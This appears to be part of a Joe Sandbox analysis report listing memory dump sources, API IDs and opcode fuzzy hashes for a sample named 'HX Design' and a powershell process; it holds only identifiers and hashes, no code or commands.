                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Time$System$File
                                                                                                                                                                                                                                                      • String ID: gfff
                                                                                                                                                                                                                                                      • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                                      • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                                      • Instruction ID: 85c5c4889fbbe77bcb9d72dabaf8e3dcdb5a9e06aca918a9376c434662c4f975
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77217E72A08A86D6DB958F29E8112B977E4EB8CB94F448035DB4DC77A9EF3CD1418B00
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                      • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                                      • Instruction ID: 79cdbe61eb4637508e46f815839cba5eab8251c58c5db154b79e27c57ffdf7f8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03212B72B1828191EB20BB19D44827EB3B1FBC4B84FC54035DA5D43695DFBCD548DB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                      • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                      • Instruction ID: 0827a57cd214d5d603c9843579ba64e3507f40d2e1e167af68632560fe601457
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C116D32608B8192EB219F15F40426AB7E5FB88B98F984230EF8D07768DF7CD555CB00
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                      • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                      • Instruction ID: 7d7887c1f5e57843612841c26cdfcad197fa124ac1919c008f8ab5197126098e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5301A721D1C30395F720BF64946527FA3A0EF44744FC00036D54D46691EFBCD548EB24
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Time$System$File
                                                                                                                                                                                                                                                      • String ID: gfff
                                                                                                                                                                                                                                                      • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                                      • Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                                      • Instruction ID: 0b6c5dbe62472a748e99f9f5b8fe0fe660c4f68ee8d397e616ed6c2f32e6da31
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D001D6E2B1864582EF61DB29F8011996790FBCC784F449032E75ECBB69EE2CD2058B40
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1827102528.00007FFD9A4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4C0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9a4c0000_powershell.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 1365b618915ff8f7fac3b864c49c7965954b1c8333f03125c088bcd743b06a38
                                                                                                                                                                                                                                                      • Instruction ID: 5b7a951c8d9f95916635ff80088f2b8627b3e3d98fb2f8f0920c249d97df8d01
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1365b618915ff8f7fac3b864c49c7965954b1c8333f03125c088bcd743b06a38
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F820C22B0DB850FE76AA76858795F47BF1EF56220B1A01FBD08DC71D7DD186C068392
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 2faa92a19fc16d02b55a1e5ded452e5d7b4b39d6812923154446579b2046ab35
                                                                                                                                                                                                                                                      • Instruction ID: c8687549ce0945c64e1443b9cf5a03bdc28c173822c1ad5c7ece6cf7f8f8dc7f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2faa92a19fc16d02b55a1e5ded452e5d7b4b39d6812923154446579b2046ab35
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B11E722A1D7C54FE717AB749C350A5BFB0EF23211B0941EBD489C70E3DB186808C392
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 8b4e4f099a994c900072ca438e92f502b84ff561883ca3f1f0245227f0e024c1
                                                                                                                                                                                                                                                      • Instruction ID: 468e151eb56e0faaaf77eb123f60b12a6c72743abdd250c10a4d76c10c3feccd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b4e4f099a994c900072ca438e92f502b84ff561883ca3f1f0245227f0e024c1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05414C66B5E7C55FEB176BB85C750993F70DE9321870E01EBC494CF0A3E918181983A6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 912a93886384fba4841e41f0e7ebcb9f0f2c1288006d2f15bd308ab5342c67ce
                                                                                                                                                                                                                                                      • Instruction ID: 2e6ecbe82ad1adc84d0725899ec71dcb488fedc33926ab6207249972bd03fb23
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 912a93886384fba4841e41f0e7ebcb9f0f2c1288006d2f15bd308ab5342c67ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF08232A28A4DCFD746EF6898285E97BE0EF65301B0501ABD81DC7062DB259948CBC1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: dd6b833295315f5a50f6e460a24379b7853e231493d296308b97838ea2547b0d
                                                                                                                                                                                                                                                      • Instruction ID: ca05ca02af6b6500b59c598a9e00e85f946ff48df577e484187f6cdd7809082f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd6b833295315f5a50f6e460a24379b7853e231493d296308b97838ea2547b0d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C412932B1CB884FEB199B9CAC566A97BE0FB95311F04427FD099C3192CA25B805C7D2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 57f7510203a8c3e1ed33c50188075154fc6a4c5b23831a1151cc517e313346ba
                                                                                                                                                                                                                                                      • Instruction ID: 8a6050a70492701ff9faf08052cb6805975dc8c34f4cd2f313f6bd9e18b9d1b6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57f7510203a8c3e1ed33c50188075154fc6a4c5b23831a1151cc517e313346ba
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29412832A1C7884FEB19DBAC984A7E9BFF0EB56331F04416FD049C3152C675A45ACB92
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1825518868.00007FFD9A2DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A2DD000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9a2dd000_powershell.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: e36f83d7046c88d9fd8b81f7176abbf2d8e60238ab669869c9be2e91930b683d
                                                                                                                                                                                                                                                      • Instruction ID: 109a55a847a0badbbf3dc16890d7984adfc56397e7bcc4b78cdc7b49f3acb2a4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e36f83d7046c88d9fd8b81f7176abbf2d8e60238ab669869c9be2e91930b683d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92414B7140EBC44FD76A8B3998519623FF0EF52314B1906EFD088CF1A3D625E846C792
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                      • Instruction ID: 0b968b20f9a29bf9e67fb101992b9066a7b9327b628ee10b1c347d3c5ee51bcf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0801A73121CB0C4FD748EF4CE451AA5B7E0FB85364F10056EE58AC3695DB36E882CB42